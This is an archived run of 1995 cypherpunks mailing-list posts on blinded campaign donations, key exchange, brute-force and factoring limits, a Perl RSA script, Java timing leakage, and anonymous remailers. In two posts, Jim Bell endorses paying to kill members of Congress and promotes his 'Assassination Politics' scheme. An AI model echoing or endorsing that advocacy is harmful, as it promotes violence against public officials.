Antonin Artaud | From jimbell at pacifier.com Mon Dec 18 00:44:30 1995 From: jimbell at pacifier.com (jim bell) Date: Mon, 18 Dec 1995 16:44:30 +0800 Subject: Campaign Finance Reform Message-ID: At 07:43 PM 12/17/95 PST, you wrote: >On December 17th you wrote: > >>To: cypherpunks at toad.com >>From: jim bell >>Subject: Political Cleanup program >> >>Politics is traditionally corrupt, it appears, because donors to politicians >>and political campaigns expect a quid pro quo for their donations. Various >>unsatisfactory solutions include campaign spending limits, etc. >> >>It occurs to me that it would be a major advance if a system could be set up >>that would "blind" campaign donations as to their source: The donor could >>be satisfied that his donation gets to the candidate or cause, but the >>candidate couldn't know who actually paid the money (and the donor would be >>unable to prove that he made a donation, for example). Admittedly there are >>a lot of details that need to be worked out, but if this could be >>accomplished it would change politics as we know it. > >If you'll give it some more thought, Jim, you'll see that it has a loophole >in it you could drive a semi through. There is no way to keep a donor from >passing the word to the recipient. No matter how you work out the details, >it's impossible to keep the information from passing. It could never work. It is absolutely true that you couldn't stop a person from communicating claims of a donation to a politician. But what you COULD do is to ensure that the donor couldn't PROVE that he made such a donation. In other words, _I_ could claim that I gave $1K to Senator Sludgepump (a lie) and the good senator would have no idea that I wasn't telling the truth. The people who REALLY made such donations would be helpless. >Consider a more radical, and possibly workable, solution to the thorny issue >of campaign finance. If we go back to the root of the problem, it seems >clear that it is the high cost of a campaign. If a typical campaign were to >cost a tenth or a twentieth of what it presently costs, we'd have gone a >long way towards ameliorating the situation. How to do it? Simply ban all >paid political spot ads - TV, radio, newspaper - all of them. Write it so >that there's damned little wiggle room - a candidate can use lawn signs, but >not billboards. They can use personal appearances, but not commercials. >They can spend all the gas money they want running around their state or >district, but not a dime for media spots. > Well, I have an even better and cheaper solution to the problem of government and politics. At an average of $20,000 per Congressman, we could clean up Washington for $10 million dollars. From futplex at pseudonym.com Mon Dec 18 00:47:29 1995 From: futplex at pseudonym.com (Futplex) Date: Mon, 18 Dec 1995 16:47:29 +0800 Subject: The Elevator Problem & Groucho's Duck In-Reply-To: <199512160537.AAA23233@pipe6.nyc.pipeline.com> Message-ID: <199512180803.DAA01695@opine.cs.umass.edu> tallpaul writes: > At this point, this holiday season, I had an image of Merkle sitting by the > tree putting an infinite number of prime numbers in an infinite number of > boxes. (In the real world I've been fighting with my landlord and suddenly > thought of Cantor's first description of the landlord's dilema where a > landlord has an infinite number of rooms, all full, when another guest > shows up and wants a room.) :] > At this point, I suddenly had an image of Cantor sitting on the floor next > to Merkle. Merkle would pack an infinite number of boxes and hand each box > to Cantor who would proceed to wrap each box in an infinite number of > sheets of wrapping paper. > > Suddenly, I saw that my first suggested solution put all of the major work > on Alice. She had to generate 10^6 prime pairs and send them all to Bob > then brute force an average of (10^6)/2 attempts to discover the one pair > Bob picked ot factor. > > This process *might* be speeded up if Bob would, Cantor-like, help out. In > other words, have Alice generate and transmit 10^3 prime pairs and have Bob > do the same. This cuts transmission time by 5*(10^5), a considerable > savings. Mmm, didn't you just cut it in half (assuming simultaneous receive/transmit), saving about 10^3 time ? (I can't get through to the archives at the moment.) Anyway, it's a nice improvement to the protocol. > Then Alice and Bob each have to brute force an average of 5*(10^2) attempts > to discover each others primes, for a similar savings. > > However, you still need a nonpatented algorythm that lets them use the four > primes to encypher their message(s) while forcing the others on the > elevator to factor an average of (10^3^2)/2 products instead of > 2*((10^3)/2). > > This is still very far from a solution to the elevator problem as re-posed > by Futplex but creates at least one way of *potetentially* shortening the > prime generation and transmission time issue he was kind enough to point > out. I guess we should once again wish Roger Schlafly the best of luck in his ongoing litigation. While we're on the subject, I've just noticed an interesting protocol in Schneier, "invented by Shamir but never published", for communication over an insecure channel without a shared secret ["Shamir's Three Pass Protocol" in v.1,Sec.16.1,pp.376-377]. This protocol seems to have very appealing features, so I'm a little surprised that only the initial reference is given in Schneier. Using Shamir's proposed commutative symmetric cipher with it, I suppose it's probably slower than DH for key exchange, and progress on the discrete log problem would affect it just as much as RSA. Anyone have other references offhand, or know any other reasons this protocol isn't so useful ? -Futplex From thad at hammerhead.com Mon Dec 18 01:03:03 1995 From: thad at hammerhead.com (Thaddeus J. Beier) Date: Mon, 18 Dec 1995 17:03:03 +0800 Subject: What ever happened to... Cray Comp/NSA co-development Message-ID: <199512180038.QAA01725@hammerhead.com> "Anitro" speculated about the fate and capabilities of the CCC PIM (processor-in-memory) machine. A friend of mine was working on it, and it would have been a screaming machine, no doubt about it. He said that the Cray mostly acted like a really fast network for the processor chips. As "Anitro" said, the PIM chips were made by a dedicated NSA company, Supercomputer Research Center, in Bowie MD. But, it was nowhere near finished when the company finally went down, and the team was completely disbanded. My friend was talking about going to the auction when the parts of the various machines were going to be sold, I don't know if he did so. He suspected that the various pieces would end up going back east to the Fort Meade area. Still, it is such an odd machine that you would probably have to transfer the staff to finish it, and that didn't happen. In any case, while it was fast (1/2 million 1-bit processors, perhaps as low as 1 nanosecond (1 GHz) cycle time), it was not fast enough to brute force reasonably strong ciphers. It's really no joke that it would take a computer with picosecond clocks the size of the earth more than the age of the universe to brute force IDEA, for instance. It would have made a great DES cracker, though; my back-of-the-envelope calculation has it cracking one key every .75 days on the average. thad -- Thaddeus Beier email: thad at hammerhead.com Technology Development vox: 408) 286-3376 Hammerhead Productions fax: 408) 292-2244 From jamesd at echeque.com Mon Dec 18 01:03:33 1995 From: jamesd at echeque.com (James A. Donald) Date: Mon, 18 Dec 1995 17:03:33 +0800 Subject: Political Cleanup program Message-ID: <199512180430.UAA02707@blob.best.net> At 11:04 AM 12/17/95 -0800, jim bell wrote: > It occurs to me that it would be a major advance if a system could be set up > that would "blind" campaign donations as to their source: The donor could > be satisfied that his donation gets to the candidate or cause, but the > candidate couldn't know who actually paid the money To make this work, the government would need to prohibit individuals from campaigning for politicians, taking out ads with political consequences, and so on and so forth. A short step from totalitarianism A better solution is to move assets and money into forms where politicians cannot get at them, thus reducing the power of politicians, and thus the incentive to buy favors from them. --------------------------------------------------------------------- | We have the right to defend ourselves | http://www.jim.com/jamesd/ and our property, because of the kind | of animals that we are. True law | James A. Donald derives from this right, not from the | arbitrary power of the state. | jamesd at echeque.com From jimbell at pacifier.com Mon Dec 18 01:08:48 1995 From: jimbell at pacifier.com (jim bell) Date: Mon, 18 Dec 1995 17:08:48 +0800 Subject: Political Cleanup program Message-ID: At 07:03 PM 12/17/95 -0500, you wrote: >On Sun, 17 Dec 1995, jim bell wrote: > >> >> It occurs to me that it would be a major advance if a system could be set up >> that would "blind" campaign donations as to their source: The donor could >> be satisfied that his donation gets to the candidate or cause, but the >> candidate couldn't know who actually paid the money (and the donor would be >> unable to prove that he made a donation, for example). Admittedly there are >> a lot of details that need to be worked out, but if this could be >> accomplished it would change politics as we know it. > >Just a straight Chaumian style blinding won't work, as there are too many >covert channels available via both timing and amounts; For example, Joe >Random Capitalist-Oppressor could arrange to pay a series of relatively >small amounts wth different values in the cents field which could be used >to confirm their payment (e.g. they could be composed to form a digitally >signed value of some kind ("pollution rools" or "lung cancer is kool") :) Yes, as I suggested a number of details would be necessary to avoid this. Reporting only cumulative donations, occasionally over a long period of time (once every three months, for instance), and even then only approximating the total number would make doing such a correlation extremely difficult. >Sen. Dianne Running-Dog could then look for a matching set of donations >and confirm that the bribe had in fact been paid. > >There are much better ways of reforming the political system -the >formation of proper political parties with real programmes (the one good >thing about the newtoid surge); changing the rules for TV advertising, >etc. Blinding just makes things worse. The blinding needs only be temporary; long enough so the politician can't act improperly on the donation, but eventually revealed in enough time to expose political influence before the next election. Besides, I have already proposed what I consider to be a _better_ method of reforming government. It's called "Assassination Politics." Perhaps you've heard of it. From ncognito at gate.net Mon Dec 18 01:12:40 1995 From: ncognito at gate.net (Ben Holiday) Date: Mon, 18 Dec 1995 17:12:40 +0800 Subject: Secured RM ? (source) In-Reply-To: <199512171048.VAA23204@sweeney.cs.monash.edu.au> Message-ID: On Sun, 17 Dec 1995, Jiri Baum wrote: > > In this particular case what im concerned about is a temporary cleartext > > copy of a permanently encrypted document. The cleartext only exists for > > about 1-4 seconds, and then is deleted, so backups arent really a > > problem.. > > Is it then necessary to write it to disk? Im pretty sure that its nessecary.. at least at this point. Basically what im working on is a bit of front end that trys to make keeping things encrypted a bit less of a hassle. It needs to be able to read multiple file types, and as such it does some odd things. It opens the file and figures out the magic for it, closes it, then jumps to the right routine for reading the particular thing.. the file is opened again, perhaps once, perhaps repeatedly, depnding on the nature of what is going on.. then when it finishes with the file the cleartext copy is removed.. the main idea pushing me here is that if you were to encrypt things on your harddrive for storage, you would most likely want access to them at some point, and if your like me, you'd want access to them on a regular basis. Prior to starting work on this project i would manually decode whichever file i needed, work with it, andd then delete it. This was a pain in the ass, and also somewhat less secure since im only human and could conceivabley forget to resecure the file after im done using it. So looking at it from a relaxed standpoint.. the code as it stands now is at least as good as the previou method i was using, and is alot simpler. :) To be a bit more critical, neither method seems to be the BEST method.. I hate saying this cause it feels like a cop out, but I keep coming back to the question of usability versus iron-clad security. At this point there is no noticible speed difference between using the program with encrypted versus decrypted files. Im pretty concerned about the overhead of getting too involved in a flawless implementation. I think at this point if i could produce a first release that would be "good enough" to pass (for example) a moderatly sophisticated once over by local law enforcement, i would be content. Once thats available I have alot of other things tthat I'd like to see done better.. Incidentally, i'm planning to post the full details including an FTP site sometime in january or febuary.. at that point i expect to be torn to shreds by the cryptographic comunity.. :) From markm at voicenet.com Mon Dec 18 01:12:52 1995 From: markm at voicenet.com (Mark M.) Date: Mon, 18 Dec 1995 17:12:52 +0800 Subject: [NOISE] BIO-MUNITION: gifs of perl-RSA tattoo In-Reply-To: Message-ID: -----BEGIN PGP SIGNED MESSAGE----- On Sun, 17 Dec 1995, Richard D. Sheffar wrote: [Perl RSA sig deleted] > Okay, I admit it I don't know everything. > What does the perl script actually do. > I saved to file, chmod 777 perly > tried running the script and kept getting error line 3. > What does it do, does it encrypt a file or what. What Have i done wrong? > The script, when supplied with a exponent (public or secret) and a modulus, encrypts standard input with the RSA algorithm and sends the result to standard output. You can get all the info on this from http://dcs.ex.ac.uk/ ~aba/rsa/. In response to why it doesn't work, did you check to see if you have a working copy of the UNIX program "dc"? -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQCVAwUBMNTogrZc+sv5siulAQHqPQP+LDCv8cNmyQh0vxcF5hS+Mk96PgpygmL4 QLjcdHZTUKHxRD8/V0b84+JITqc8uPKy/aN6Vp9ZiihRb8VBxWQzbJt5w2YIglW0 jzh1IFiRQ1O2oJzNG+mNjJfrJYwXG88BcajOd7JrsPj0uC9oh5hkRMFgMtFSjNsm m5G+F4rLlBM= =D9LX -----END PGP SIGNATURE----- finger markm at voicenet.com for Public Key http://www.voicenet.com/~markm/ Key-ID: 0xF9B22BA5 Fingerprint: bd24d08e3cbb53472054fa56002258d5 -----BEGIN GEEK CODE BLOCK----- Version: 3.1 GAT d- s:- a? C++++ U+++>$ P+++ L++(+++) E--- W++(--) N+++ o- K w--- O- M- V-- PS+++>$ PE-(++) Y++ PGP+(++) t-@ 5? X++ R-- tv+ b+++ DI+ D++ G+++ e! h* r! y? ------END GEEK CODE BLOCK------ From alano at teleport.com Mon Dec 18 01:13:32 1995 From: alano at teleport.com (Alan Olsen) Date: Mon, 18 Dec 1995 17:13:32 +0800 Subject: [more NOISE] BIO-MUNITION: gifs of perl-RSA tattoo Message-ID: <2.2b7.32.19951218083043.0088d0c0@mail.teleport.com> At 11:06 PM 12/17/95 -0500, you wrote: [Much noise on Perl-RSA tatoo and compile problems deleted] The only thought that came to mind on this thread was how closely the tatoo artist spellchecked that tatoo. It would be pretty funny to have a "munitions violation" that was non-functional due to tatooing errors. | Remember: Life is not always champagne. Sometimes it is REAL pain. | |"It's only half a keyserver. I had to split the | Disclaimer: | |other half with the government man." - R. Rococo | Ignore the man | |`finger -l alano at teleport.com` for PGP 2.6.2 key | behind the keyboard.| | http://www.teleport.com/~alano/ | alano at teleport.com | From tcmay at got.net Mon Dec 18 01:23:49 1995 From: tcmay at got.net (Timothy C. May) Date: Mon, 18 Dec 1995 17:23:49 +0800 Subject: What ever happened to... Cray Comp/NSA co-development Message-ID: At 10:32 PM 12/17/95, Anonymous wrote: >What caught my attention was the architecture. > >A "hybrid design linking two supercomputer processors with an >array of HALF A MILLION inexpensive processors" that were >designed by the U.S. government laboratory affiliated with the >NSA. The same chip house that brought us Clipper. First, half a million chips is not that big a deal...the Connection Machine had up to 64,000. Very few cryptographic problems of interest to us will be affected by a mere factor of a million or so. Second, there was work on a "processor-in-memory" architecture, in conjunction with a Bowie, Maryland spook-connected company. Perhaps this is what you are thinking of? Third, all avenues of continued funding having fallen through, Cray Computer (not Cray Research, of course) was shut down and assets liquidated. I haven't heard what's become of Seymour, though. (He is undoubtedly an asset, buy I doubt the Agency would have him liquidated.) >I've not kept up with the "ultimate" demise that eventually >befell Cray Computer Company, but the October 16 FBI filing >on capacity for Digital Telephony got me thinking back to this >article. 1% seems like a rather huge need for horsepower. And >what if GAK doesn't fly? And the widespread use of hard crypto >just keeps increasing? The tightly-coupled supercomputers are hardly needed for these sorts of problems. >This kind of machine could, in theory: > >1) Implement ALL Clipper(II) based Key Escrow functionality in > silicon (the easy part) AND allow for simultaneous decrypt and > surveil of 'who knows how many' Clipper based data streams. Huh? First, what evidence do you have for this claim? Second, who cares? Implementing Clipper in a Cray Computer machine--why bother? As to the claim that a million-processor machine could do this, you need to work out the math. (If a backdoor exists, or the LEAF has been gotten, a supercomputer is not needed....) >2) Implement general RSA based Prime Factoring functionality in > silicon (the not so easy part) AND allow massively parallel > decrypt and surveil of 'who knows how many' RSA/etc. based > data streams. Prime Factoring? Primes are easy to factor, of course. (Hint: Every prime has two factors.) If you mean using supercomputers to brute force the general factoring of an RSA modulus, this is nonsense. While there may be math shortcuts we don't yet publically know about which make factoring easier than we currently think it is, a mere million or even a billion processors will not make a dent in the factoring of, say, a 700-digit modulus. See the tables in Schneier and elsewhere for some estimates of factoring efforts needed. >3) Implement it all, AND 'on-line' transaction based surveillance > via the FBI's 1% capacity infrastructure. Let's see some numbers. (On second thought, let's not.) >Chilling... Who needs key escrow (or RSA private keys) when >you've got a massively parallel prime factoring machine. What if >GAK was to become a 'non-issue'? How fast do you think a machine >such as this could factor RSA 129? Well, do the math. The MIPS-years for the RSA-129 crack were publicized, so the computation for a million SPARC-equivalent (or even UltraSPARC-equivalent) can be done. When you've done this, and concluded that RSA-129 could be done in, say, X minutes, then move on to RSA-384 (the BlackNet key cracked by the MIT group), and on to the 1024- and 2048-bit keys. Tell us how many years or centuries it will take. (Hint: Rivest and Schneier have done these calculations....) --Tim May, who fears that he's just been trolled by Derek Atkins Views here are not the views of my Internet Service Provider or Government. ---------:---------:---------:---------:---------:---------:---------:---- Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero Corralitos, CA | knowledge, reputations, information markets, Higher Power: 2^756839 | black markets, collapse of governments. "National borders are just speed bumps on the information superhighway." From jlasser at rwd.goucher.edu Mon Dec 18 03:02:53 1995 From: jlasser at rwd.goucher.edu (Jon Lasser) Date: Mon, 18 Dec 1995 19:02:53 +0800 Subject: Campaign Finance Reform In-Reply-To: Message-ID: On Sun, 17 Dec 1995, jim bell wrote: > >>It occurs to me that it would be a major advance if a system could be set up > >>that would "blind" campaign donations as to their source: The donor could > >>be satisfied that his donation gets to the candidate or cause, but the > >>candidate couldn't know who actually paid the money (and the donor would be > >>unable to prove that he made a donation, for example). Admittedly there are > >>a lot of details that need to be worked out, but if this could be > >>accomplished it would change politics as we know it. > > > >If you'll give it some more thought, Jim, you'll see that it has a loophole > >in it you could drive a semi through. There is no way to keep a donor from > >passing the word to the recipient. No matter how you work out the details, > >it's impossible to keep the information from passing. It could never work. > > It is absolutely true that you couldn't stop a person from communicating > claims of a donation to a politician. But what you COULD do is to ensure > that the donor couldn't PROVE that he made such a donation. In other words, > _I_ could claim that I gave $1K to Senator Sludgepump (a lie) and the good > senator would have no idea that I wasn't telling the truth. The people who > REALLY made such donations would be helpless. A tricky way around this, if it's done ALMOST properly, is to donate in odd amounts... ie "Senator Sludgepump, I am going to donate $469.23 to your campaign..." All this means is that the donations would have to be lumped in some way so that Senator Sludgepump can't find out the exact amounts donated by any individual. ObCrypto: Donating a specific amount of money could be considered a covert channel. Jon ------------------------------------------------------------------------------ Jon Lasser (410)494-3072 Visit my home page at http://www.goucher.edu/~jlasser/ You have a friend at the NSA: Big Brother is watching. Finger for PGP key. From jim at bilbo.suite.com Mon Dec 18 20:02:48 1995 From: jim at bilbo.suite.com (Jim Miller) Date: Mon, 18 Dec 95 20:02:48 PST Subject: Java and timing info - second attempt Message-ID: <9512190402.AA12992@bilbo.suite.com> I asked about using Java scripts to capture remote timing info before and got no response. I assume everyone thought it was a stupid question. Therefore, I'll ask it again. The thing that makes Java a big deal is that you execute other people's code on your machine. You browse a Java-enhanced Web page, click on something interesting, suck across an applet, and execute it on your machine. This setup enables a bunch of nifty interactive Web stuff. Turn the picture around: You setup a Java-enhanced Web page, include some interesting buttons to click, write some clever applet, and people around the world suck your applet onto their machine and execute it. Combine this with some a standard crypto API for doing Web-based digital signatures or authentication or encryption and you may begin to see some possibilities. Would it be possible to create a Java applet that causes the client machine to sign or encrypt something with their private key, and then send back timing info? For the answer to be YES a few things need to be true. There needs to be some sort of standard crypto API in use that can be accessed by a Java script, and Java scripts need to be able to capture and send back timing info. Does anyone on this list know enough about Java to know if it can do any of these things? Jim_Miller at suite.com From aba at atlas.ex.ac.uk Mon Dec 18 04:15:09 1995 From: aba at atlas.ex.ac.uk (aba at atlas.ex.ac.uk) Date: Mon, 18 Dec 1995 20:15:09 +0800 Subject: BIO-MUNITION: gifs of perl-RSA tattoo In-Reply-To: Message-ID: <14204.9512181148@exe.dcs.exeter.ac.uk> Richard Sheffar writes on cpunks: > Okay, I admit it I don't know everything. > What does the perl script actually do. It does RSA encrypt/decrypt, works with keys up to 1024 bits (and larger). > I saved to file, chmod 777 perly > tried running the script and kept getting error line 3. You need two utils installed on your machine: perl and dc. Not having dc would cause an error on line 3. Try getting gnu dc (bc-1.03.tar.gz from gnu sites, see: http://www.dcs.ex.ac.uk/~aba/rsa/dc.html ) > What does it do, does it encrypt a file or what. What Have i done wrong? To encrypt: rsa -k=11 -n=ca1 < plaintext > ciphertext to decrypt: rsa -d -k=ac1 -n=ca1 < ciphertext > out you can extract pgp keys to use with it, that was a 32 bit key for demonstrational purposes and offers no security. See: http://www.dcs.ex.ac.uk/~aba/rsa/pgpacket.html for extracting pgp keys in hex format. Adam From dan at milliways.org Mon Dec 18 07:29:46 1995 From: dan at milliways.org (Dan Bailey) Date: Mon, 18 Dec 1995 23:29:46 +0800 Subject: Motorola Secure Phone Message-ID: <199512181337.NAA28013@pop01.ny.us.ibm.net> On Sun, 17 Dec 1995 17:38:49 -0800 you wrote: >At 06:40 PM 12/15/95 EST, you wrote: >> > >I don't know Moto's phone models, but there are some cordless phones, >especially long-range 900MHz ones, that are "secure" because of >spread-spectrum, and others that call themselves "secure" because >they're "digital", so you can't eavesdrop on them just by playing >with a scanner and maybe single-sideband. Sigh. > Well, just to finish the story, I ended up getting the Cincinatti Microwave Escort 9000 (yes, the radar detector people). It's 900 MHz digital spread-spectrum, although it's still unclear how secure their implementation is. I'll call them and see what I can come up with....I realize it's *not* going to give me military-style security. But really all I'm interested in is making it simpler (ie cheaper) for Big Brother to wiretap me than to deal with trying to scan me without court authorization. Dan *************************************************************** #define private public dan at milliways.org Worcester Polytechnic Institute and The Restaurant at the End of the Universe *************************************************************** From jya at pipeline.com Mon Dec 18 07:31:28 1995 From: jya at pipeline.com (John Young) Date: Mon, 18 Dec 1995 23:31:28 +0800 Subject: GIA_nts Message-ID: <199512181341.IAA28130@pipe1.nyc.pipeline.com> 12-18-95. NYPaper: "Telecommunications Giants Join Internet Security Quest." The consortium seeks to establish a layer of software and hardware standards that would effectively rest atop the Internet. Their goal is to make the Internet more secure, reliable and easy to use. The consortium started meeting last summer, and had seven core members: AT&T, Deutsche Telekom, Lotus, Novell, NTT, the Telstra Corporation and Unisource. The group held private meetings from Dec. 6 through Dec. 9 in New York, attended by 24 phone carriers and 14 computer companies, including Intel, Microsoft, Sun and the Hewlett-Packard. "The prospect of Internet censorship raises troubling issues for business." Denise Caruso's column. While most of the outcry has raised valid concerns about the First Amendment and civil liberties, little of the discussion has focused on how censorship could cripple much of the Internet's commercial potential. "This proposal will have more than a chilling effect," Ms. Fulton said. "It may well mean a cold death for everyone except very rich and very cautious media companies." GIA_nts (11 kb) From raph at CS.Berkeley.EDU Mon Dec 18 07:53:20 1995 From: raph at CS.Berkeley.EDU (Raph Levien) Date: Mon, 18 Dec 1995 23:53:20 +0800 Subject: List of reliable remailers Message-ID: <199512181450.GAA18890@kiwi.cs.berkeley.edu> I operate a remailer pinging service which collects detailed information about remailer features and reliability. To use it, just finger remailer-list at kiwi.cs.berkeley.edu There is also a Web version of the same information, plus lots of interesting links to remailer-related resources, at: http://www.cs.berkeley.edu/~raph/remailer-list.html This information is used by premail, a remailer chaining and PGP encrypting client for outgoing mail, which is available at: ftp://ftp.csua.berkeley.edu/pub/cypherpunks/premail/premail-0.33a.tar.gz For the PGP public keys of the remailers, finger pgpkeys at kiwi.cs.berkeley.edu This is the current info: REMAILER LIST This is an automatically generated listing of remailers. The first part of the listing shows the remailers along with configuration options and special features for each of the remailers. The second part shows the 12-day history, and average latency and uptime for each remailer. You can also get this list by fingering remailer-list at kiwi.cs.berkeley.edu. $remailer{"extropia"} = " cpunk pgp special"; $remailer{"portal"} = " cpunk pgp hash"; $remailer{"alumni"} = " cpunk pgp hash"; $remailer{"bsu-cs"} = " cpunk hash ksub"; $remailer{"c2"} = " eric pgp hash reord"; $remailer{"penet"} = " penet post"; $remailer{"ideath"} = " cpunk hash ksub reord"; $remailer{"hacktic"} = " cpunk mix pgp hash latent cut post ek"; $remailer{"flame"} = " cpunk mix pgp. hash latent cut post ek reord"; $remailer{"rahul"} = " cpunk pgp hash filter"; $remailer{"mix"} = " cpunk mix pgp hash latent cut ek ksub reord ?"; $remailer{"syrinx"} = " cpunk pgp hash cut reord mix post"; $remailer{"ford"} = " cpunk pgp hash ksub"; $remailer{"hroller"} = " cpunk pgp hash latent ek"; $remailer{"vishnu"} = " cpunk mix pgp. hash latent cut ek ksub reord"; $remailer{"robo"} = " cpunk hash mix"; $remailer{"replay"} = " cpunk mix pgp hash latent cut post ek"; $remailer{"spook"} = " cpunk mix pgp hash latent cut ek reord"; $remailer{"rmadillo"} = " mix cpunk pgp hash latent cut"; $remailer{"ecafe"} = " cpunk mix"; $remailer{"wmono"} = " cpunk mix pgp. hash latent cut ek"; $remailer{"shinobi"} = " cpunk mix hash latent cut ek reorder"; $remailer{"amnesia"} = " cpunk mix pgp hash latent cut ek ksub"; $remailer{"gondolin"} = " cpunk mix pgp hash latent cut ek reord"; $remailer{'alpha'} = ' alpha pgp'; $remailer{'gondonym'} = ' alpha pgp'; catalyst at netcom.com is _not_ a remailer. lmccarth at ducie.cs.umass.edu is _not_ a remailer. usura at replay.com is _not_ a remailer. Groups of remailers sharing a machine or operator: (c2 robo hroller alpha) (gondolin gondonym) (flame hacktic replay) (alumni portal) Use "premail -getkeys pgpkeys at kiwi.cs.berkeley.edu" to get PGP keys for the remailers. Fingering this address works too. Over the past few weeks, the remailer-list has been showing somewhat poor performance of the remailers. Well, most of the problem was my fault, rather than that of the remailers. I had managed to turn off suid on my sendmail binary, with bad results. It's fixed now. Last update: Mon 18 Dec 95 6:49:26 PST remailer email address history latency uptime ----------------------------------------------------------------------- mix mixmaster at remail.obscura.com __...-++-+++ 9:56:07 99.98% hacktic remailer at utopia.hacktic.nl *********+* 7:46 99.94% ecafe cpunk at remail.ecafe.org #-##_#--#### 49:58 99.92% c2 remail at c2.org + ++-.--++++ 1:27:22 99.91% flame remailer at flame.alias.net *********+* 12:10 99.85% amnesia amnesia at chardos.connix.com +--+------- 2:55:50 99.84% portal hfinney at shell.portal.com ####*# .#**+ 54:51 99.80% replay remailer at replay.com ** ********# 24:11 99.80% bsu-cs nowhere at bsu-cs.bsu.edu #_##.#*#-# 50:50 99.64% rmadillo remailer at armadillo.com + +++++++ ++ 39:23 99.55% vishnu mixmaster at vishnu.alias.net #-*#*++* 20:25 99.40% alumni hal at alumni.caltech.edu #_*_.-+*++ 1:00:21 99.37% ford remailer at bi-node.zerberus.de .--._._.-+++ 14:08:00 99.24% spook remailer at valhalla.phoenix.net **** - * *+* 22:56 99.10% hroller hroller at c2.org ## -...-##+# 44:42 98.83% wmono wmono at valhalla.phoenix.net * * .* *+* 16:13 98.72% penet anon at anon.penet.fi _--_--__.. 31:02:40 98.56% shinobi remailer at shinobi.alias.net - -_- +++-- 52:27 96.76% extropia remail at extropia.wimsey.com .----_.-.- 13:31:30 94.19% rahul homer at rahul.net +**+*_.*#++# 1:18:24 99.92% gondolin mix at remail.gondolin.org -_.------ 8:23:37 79.17% robo robo at c2.org # *# 3:38 57.61% History key * # response in less than 5 minutes. * * response in less than 1 hour. * + response in less than 4 hours. * - response in less than 24 hours. * . response in more than 1 day. * _ response came back too late (more than 2 days). cpunk A major class of remailers. Supports Request-Remailing-To: field. eric A variant of the cpunk style. Uses Anon-Send-To: instead. penet The third class of remailers (at least for right now). Uses X-Anon-To: in the header. pgp Remailer supports encryption with PGP. A period after the keyword means that the short name, rather than the full email address, should be used as the encryption key ID. hash Supports ## pasting, so anything can be put into the headers of outgoing messages. ksub Remailer always kills subject header, even in non-pgp mode. nsub Remailer always preserves subject header, even in pgp mode. latent Supports Matt Ghio's Latent-Time: option. cut Supports Matt Ghio's Cutmarks: option. post Post to Usenet using Post-To: or Anon-Post-To: header. ek Encrypt responses in reply blocks using Encrypt-Key: header. special Accepts only pgp encrypted messages. mix Can accept messages in Mixmaster format. reord Attempts to foil traffic analysis by reordering messages. Note: I'm relying on the word of the remailer operator here, and haven't verified the reord info myself. mon Remailer has been known to monitor contents of private email. filter Remailer has been known to filter messages based on content. If not listed in conjunction with mon, then only messages destined for public forums are subject to filtering. Raph Levien From bdavis at thepoint.net Mon Dec 18 08:19:25 1995 From: bdavis at thepoint.net (Brian Davis) Date: Tue, 19 Dec 1995 00:19:25 +0800 Subject: Campaign Finance Reform In-Reply-To: Message-ID: On Mon, 18 Dec 1995, Jon Lasser wrote: > On Sun, 17 Dec 1995, jim bell wrote: ... > > It is absolutely true that you couldn't stop a person from communicating > > claims of a donation to a politician. But what you COULD do is to ensure > > that the donor couldn't PROVE that he made such a donation. In other words, > > _I_ could claim that I gave $1K to Senator Sludgepump (a lie) and the good > > senator would have no idea that I wasn't telling the truth. The people who > > REALLY made such donations would be helpless. > > A tricky way around this, if it's done ALMOST properly, is to donate in > odd amounts... ie "Senator Sludgepump, I am going to donate $469.23 to > your campaign..." > > All this means is that the donations would have to be lumped in some way > so that Senator Sludgepump can't find out the exact amounts donated by > any individual. Cancelled checks. Or, hand check in addressed, stamped envelope to Senator Sludgepump and ask him if he would mind sealing it and dropping it in a mailbox. Etc., etc. For once, you guys aren't being very creative. From perry at piermont.com Mon Dec 18 08:25:48 1995 From: perry at piermont.com (Perry E. Metzger) Date: Tue, 19 Dec 1995 00:25:48 +0800 Subject: redirect of newsgroups In-Reply-To: <9511188193.AA819305757@cc2.dttus.com> Message-ID: <199512181543.KAA09973@jekyll.piermont.com> "David Klur" writes: > For those of us sitting behind a firewall that blocks out all of the > alt, rec, etc.. newsgroups...is there another way to access these > groups? 1) Firewalls don't block newsgroups. 2) This has nothing to do with cryptography. .pm From frissell at panix.com Mon Dec 18 10:33:52 1995 From: frissell at panix.com (Duncan Frissell) Date: Tue, 19 Dec 1995 02:33:52 +0800 Subject: Political Cleanup program Message-ID: <2.2b8.32.19951218161154.0069e694@panix.com> At 10:35 AM 12/18/95 -0500, Brian Davis wrote: >> A better solution is to move assets and money into forms where >> politicians cannot get at them, thus reducing the power of politicians, >> and thus the incentive to buy favors from them. > >I'm not sure what you mean here: are politicians to be prohibited from >campaigning (which cost money)? And if politicians, who generally take >the form of human beings, can't get at $$$, how can you or I? Brian, the above means cut the power and the purse of politicians so they have nothing to sell to contributors so no contributors will buy. DCF From rah at shipwright.com Mon Dec 18 10:43:05 1995 From: rah at shipwright.com (Robert Hettinga) Date: Tue, 19 Dec 1995 02:43:05 +0800 Subject: (fwd) the anonymizer (Mac Anonymous Web Proxy?) Message-ID: > >Date: Sun, 17 Dec 1995 10:04:16 -0700 >From: webmaster at silkpresence.com (Pete Storm) >To: apple-internet-providers at solutions.apple.com >Subject: the anonymizer >Message-ID: > > hi all, > > if everyone could take a look at >, i'd appreciate it. by >following a link at this site, you begin surfing anoymously. now, can this >be programmed and run on a mac(s)? if so, please contact me personally and >we'll talk about my clients contracting out for this. > > if you can't get ahold of my (e.g. mail bounces) try >webmaster at joshua.silkpresence.com or webmaster at aimc.com as well as we're in >the middle of registering the new network. > >thanks, >phs > > >>>>>> > >Pete Storm >SilkPresence.Com Internet/WWW Publishing and Solutions >webmaster at SilkPresence.Com http://SilkPresence.Com > >Fabio Casartelli (August 1, 1970 - July 18, 1995) (TdF No. 114) > >Fallen in the quest for ultimate glory... > > ----------------- Robert Hettinga (rah at shipwright.com) e$, 44 Farquhar Street, Boston, MA 02131 USA (617) 958-3971 "Reality is not optional." --Thomas Sowell The NEW(!) e$ Home Page: http://thumper.vmeng.com/pub/rah/ >>>>Phree Phil: Email: zldf at clark.net http://www.netresponse.com/zldf <<<<< From andr0id at midwest.net Mon Dec 18 10:54:13 1995 From: andr0id at midwest.net (andr0id at midwest.net) Date: Tue, 19 Dec 1995 02:54:13 +0800 Subject: Motorola Secure Phone Message-ID: <199512181805.MAA11178@cdale1.midwest.net> 